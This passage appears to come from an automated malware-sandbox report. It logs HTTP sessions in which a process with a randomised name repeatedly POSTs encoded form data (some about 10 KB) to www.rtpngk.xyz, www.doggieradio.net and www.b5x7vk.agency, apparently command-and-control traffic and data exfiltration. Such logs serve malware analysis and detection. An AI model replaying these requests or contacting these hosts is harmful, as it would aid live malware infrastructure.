                                                      Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      40 | 192.168.2.4 | 63356 | 104.21.11.31 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:19:49.953535080 CEST | 500 | OUT | GET /zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.b5x7vk.agency
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:19:50.920229912 CEST | 1132 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:19:50 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnA3NFqTD91MEVzKU3yAG79CS%2FCoHlLlDjcbJ2qwwOFSMBBWCTyU4pcWJS7ZMMDJRrySg7sT10aKma%2FlsLy%2FhwmthjUexifD2nYoDLR7XxJ9PY29Bhfxg6yjWxP9g0Vq5F1uCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c169413c89d41c1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      41 | 192.168.2.4 | 63357 | 188.114.97.3 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:19:55.986718893 CEST | 757 | OUT | POST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 35 33 7a 36 4b 66 38 2f 58 4e 73 33 61 74 4b 6d 73 71 58 70 4b 32 6a 32 57 78 4f 76 44 78 2b 77 49 68 7a 77 63 6d 4f 64 77 72 50 67 63 66 55 32 43 73 34 70 41 55 73 4e 6a 56 37 6d 55 4e 41 62 73 31 75 4a 64 32 72 6b 53 52 4f 33 49 66 50 42 51 32 54 56 34 34 6e 77 4f 32 38 34 61 79 74 77 2f 4e 38 37 42 4d 38 74 59 68 6d 30 63 53 62 73 6c 4a 4c 4b 52 6a 6f 6f 58 59 6e 6f 37 37 66 2f 4a 6e 4e 77 56 4d 6a 53 67 32 39 6b 33 51 43 4d 69 7a 49 61 33 75 79 30 70 78 49 6e 71 74 71 75 2f 67 51 78 6b 43 6e 6f 48 42 70 4e 62 54 6b 50 35 56 6d 72 67 3d 3d
                                                      Data Ascii: pP_8=YZ133TNI48Xde53z6Kf8/XNs3atKmsqXpK2j2WxOvDx+wIhzwcmOdwrPgcfU2Cs4pAUsNjV7mUNAbs1uJd2rkSRO3IfPBQ2TV44nwO284aytw/N87BM8tYhm0cSbslJLKRjooXYno77f/JnNwVMjSg29k3QCMizIa3uy0pxInqtqu/gQxkCnoHBpNbTkP5Vmrg==
                                                      Sep 11, 2024 11:19:56.435580969 CEST | 844 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:19:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:19:56 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2BKBHNYmdfNxb8dNcz4CPWLUATHjz0MNbQ2HJ35IIpnmzVYZT8zD94VtzfTQ2trtmmzdVTEFsLeSDTkSVjCqMpTrXlr5BCqeWP%2F1Nwf%2BI6O%2B54D9yKtDxK4YPxpmHGBtTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c16943969d24392-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      42 | 192.168.2.4 | 63358 | 188.114.97.3 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:19:58.536246061 CEST | 777 | OUT | POST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 5a 48 7a 38 64 72 38 33 58 4e 74 36 4b 74 4b 30 73 71 54 70 4b 79 6a 32 58 45 44 6f 31 42 2b 77 73 70 7a 78 59 79 4f 51 51 72 50 71 38 66 52 34 69 74 30 70 41 49 53 4e 6a 70 37 6d 55 78 41 62 74 6c 75 4a 4e 4b 6b 6c 43 52 4d 69 59 66 65 4d 77 32 54 56 34 34 6e 77 4f 79 61 34 61 71 74 33 50 39 38 30 41 4d 37 6a 34 68 6c 31 63 53 62 6e 46 4a 50 4b 52 69 39 6f 56 73 5a 6f 35 7a 66 2f 49 33 4e 7a 42 34 67 5a 67 32 2f 67 33 51 51 64 79 32 57 52 6c 37 4f 39 72 39 42 68 2b 73 58 69 5a 78 4b 67 56 6a 77 36 48 6c 61 51 63 61 51 43 36 6f 76 77 70 49 74 47 57 70 4f 44 71 74 75 53 4d 48 62 2b 36 43 51 78 41 30 3d
                                                      Data Ascii: pP_8=YZ133TNI48XdeZHz8dr83XNt6KtK0sqTpKyj2XEDo1B+wspzxYyOQQrPq8fR4it0pAISNjp7mUxAbtluJNKklCRMiYfeMw2TV44nwOya4aqt3P980AM7j4hl1cSbnFJPKRi9oVsZo5zf/I3NzB4gZg2/g3QQdy2WRl7O9r9Bh+sXiZxKgVjw6HlaQcaQC6ovwpItGWpODqtuSMHb+6CQxA0=
                                                      Sep 11, 2024 11:19:58.981581926 CEST | 838 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:19:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:19:58 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHAL07MT7La40jbuISBCgvpcrIc%2FngHLO0muijQFYCErD4hzzisNj7J123aZbfQNH8KKbBuMeuvhnhXMHjf80KKNtuyj5lqHM8OIyfujdNuElJ8MeC6i6D8WfDHLYyfbBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694494ce5c40c-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      43 | 192.168.2.4 | 63359 | 188.114.97.3 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:20:01.082154036 CEST | 10859 | OUT | POST /altr/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.rtpngk.xyz
                                                      Origin: http://www.rtpngk.xyz
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.rtpngk.xyz/altr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 5a 31 33 33 54 4e 49 34 38 58 64 65 5a 48 7a 38 64 72 38 33 58 4e 74 36 4b 74 4b 30 73 71 54 70 4b 79 6a 32 58 45 44 6f 31 4a 2b 77 2b 78 7a 77 36 61 4f 52 51 72 50 30 73 66 51 34 69 73 75 70 41 42 56 4e 6a 6c 72 6d 53 39 41 61 50 39 75 65 4f 53 6b 71 43 52 4d 67 59 66 4f 42 51 32 4b 56 34 6f 6a 77 4f 43 61 34 61 71 74 33 4e 6c 38 7a 52 4d 37 7a 49 68 6d 30 63 53 48 73 6c 4a 6e 4b 52 37 47 6f 56 34 4a 6f 6f 54 66 2f 70 48 4e 6a 6b 4d 67 46 77 32 68 73 58 52 44 64 7a 4b 33 52 6c 6d 2f 39 71 4a 34 68 35 63 58 68 4e 59 41 39 52 33 72 69 68 31 69 43 50 69 79 4f 4e 45 64 2f 71 45 72 43 47 46 77 55 36 35 39 66 4d 53 65 37 5a 4f 37 6e 57 62 50 49 73 66 4b 77 70 63 69 59 75 62 74 72 49 6e 35 53 64 2f 53 69 2f 58 37 56 79 49 69 62 31 61 4d 47 2b 38 6f 62 6b 42 36 66 78 48 43 67 42 35 77 46 74 51 32 74 39 70 52 51 4c 38 76 6e 42 69 6f 6c 75 45 43 2b 54 63 43 2f 79 4e 67 58 54 39 64 4b 63 51 65 61 56 39 58 33 2b 4e 42 4b 38 32 6a 4d 51 45 70 4f 2b 30 51 2f 70 2b 43 47 53 53 54 69 4d 68 59 4a [TRUNCATED]
                                                      Data Ascii: pP_8= [TRUNCATED]
                                                      Sep 11, 2024 11:20:01.543066025 CEST | 842 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:20:01 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:20:01 GMT
                                                      Location: https://www.rtpngk.xyz/altr/
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KSr%2Ff0nysNpaFQAenRzZQT79L0cBZtbNeIJ1QBxoWoICjayG5fuwHnGuQ%2FgQKHfoVm3d%2F8kKlwMGEZUb64PwDmGYE0RWyOgDCPX83G3G46BVj4dMveDSKYKgBJunp3lyfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694594ac56a4e-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      44 | 192.168.2.4 | 63360 | 188.114.97.3 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:20:03.627640963 CEST | 497 | OUT | GET /altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.rtpngk.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:20:04.080636978 CEST | 961 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:20:04 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 167
                                                      Connection: close
                                                      Cache-Control: max-age=3600
                                                      Expires: Wed, 11 Sep 2024 10:20:04 GMT
                                                      Location: https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK+0qwwL6pFhzbi14fGg/CN3kiEzjMV75sm4cjiJhcKV1R019AsMCDZ1hQxpRPghO7Wf1QtEjpaGbTqiMLtSz+Xi+YiI4oFd5iwYses=&V0Qh=4pBta8
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdFL2HA2%2BKb5tec2UHAVlpGZrKZ%2FD0hcpc%2Ft8NkFZ5sQGYotzIle91jpg1pqzyRdScHzahlnotCqoJJIoVFc7naCfOMko%2Bo0XcSWkMO5E02dnUJX%2BZaaK5EgUHhSwYiuEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8c1694692a4f42fc-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      45 | 192.168.2.4 | 63361 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Sep 11, 2024 11:20:09.775651932 CEST | 772 | OUT | POST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2f 4e 77 7a 4d 5a 58 57 45 59 48 52 36 44 71 64 51 30 52 71 4b 58 79 69 39 61 51 6b 38 64 5a 35 4d 76 4f 41 6a 63 50 62 44 6f 48 79 6b 70 65 2b 77 6d 58 43 6a 53 6e 48 35 66 43 6e 39 59 7a 36 6d 48 6c 66 73 56 58 56 62 63 48 49 47 75 71 76 69 4e 58 66 62 53 6d 78 62 45 4e 6f 47 78 57 52 64 74 70 58 77 7a 56 76 6d 79 36 7a 67 65 69 35 6b 78 2b 65 6a 30 73 35 6b 4c 4c 4b 42 30 4a 45 77 4f 42 4a 53 54 34 7a 78 59 50 45 69 33 6f 39 79 5a 73 61 6b 6f 66 47 48 59 33 46 79 6d 6e 55 6d 52 39 77 42 78 6c 77 59 77 4d 4d 61 6a 57 7a 78 75 77 58 70 51 48 4b 48 51 7a 75 6c 4b 45 49 4b 77 3d 3d
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6DqdQ0RqKXyi9aQk8dZ5MvOAjcPbDoHykpe+wmXCjSnH5fCn9Yz6mHlfsVXVbcHIGuqviNXfbSmxbENoGxWRdtpXwzVvmy6zgei5kx+ej0s5kLLKB0JEwOBJST4zxYPEi3o9yZsakofGHY3FymnUmR9wBxlwYwMMajWzxuwXpQHKHQzulKEIKw==


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       46 | 192.168.2.4 | 63362 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:12.315643072 CEST | 792 | OUT | POST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6iadSTFqfnyly6Qk19Z9MvKAjdKWDazykMi+xkvCgSnHx/Ci5Yy2mH48sUHVbcDIGsyvj6rcaCmzHENmIRWRdtpXwwoCmyizguy5lVrIqUs6nLLKF0JIwOB/SRdcxa3EiyU9yIsZuofIK42P0nmk+SMff34SfSEPSFHpgfRA7Qj5aX6aoJ5BR8+tI+agfGN2G8Vvapth5jM=


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       47 | 192.168.2.4 | 63363 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Sep 11, 2024 11:20:14.867248058 CEST | 10874 | OUT | POST /hzuv/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.doggieradio.net
                                                      Origin: http://www.doggieradio.net
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.doggieradio.net/hzuv/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Ascii: pP_8=/NwzMZXWEYHR6iadSTFqfnyly6Qk19Z9MvKAjdKWDaryk+a+xD7ChSnH7fCj5Yy7mHwgsULjbfrIUf6vy+/cTCmzfENnGxW+dt5Tww4Cmyizgr25xx/IsUs5kLLGB0IdwKlBSRIjxKXEiSk91+AZo4fKN43a0i+7+SA5f3l/fQYPSAD/1bhvmz7FHkGxg6ZWJrnQB+y5C1sECuINKLdfunxxsjGWlFaew5m264n5SxNqI9rZ4hB2UEAEUOXaNx2UCBBzIXWyxy02dgLXOD3phRP9Jlw+WmAiqkmIbMQBfgiGciukBjzOwELXQB62GgCKZGQNfEqn3GTCLFKDs5H8oA7Na8Z5xjm/IpnxPuv0F6hHIp9+eUTAGddBjmykd7+5LtCuqQjfD1Xzj7sixDXCoO/dPrvsBhV+Ouw73FZDQX7kYeJUtsD1bkSTfwGBmoslfunOSf+P7WtD37MWHe15fowCBVmXE87QQCsDYMYIkovfjRZYhRv28EzDHj2NmvF9ZFen+6DsI24BfO8jykRALI7ZwvcCXQLbpHp9I04LGShjAo7ZwXNY+P4uvC89B1uLpAjSWqFijMD0RxRUban6SHVeMXrUizjkajMEOsTwqZbwoZILIJxqnArILL9BHR7Of5xJ56xZtN08+ci2+xKq3gxjCibO3E9Jie46uyTT691eiiewqwUVD+xM/dRTCwAAy/v3VKzCJJLOedS1Xo2/iVPZLl+BYgo3Z1SoQssjmSkga2j7EVWl9mJHhvXU/l+kHm/pR0SoKPFzhUxezv3Xw7DmkgFZp96abTgvkf36P4e8Tf83weukbmEHqZ6hfkEDxjId6D9Emho8WkkHSQLP1BJyiM+mTq/CZMxHY1ux/773VYCwymnOLeFspgROs/4ZtDVviUcD30PiEm2VCkVr/AU93aBXIqc95xP0k5eVQF7tHmdMbpEUeJECVZEVmVXRHXFTh3bIgqCSUT8Kkuum6WJqm2ddba26q+EOGG5Io3nlwoN [TRUNCATED]


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
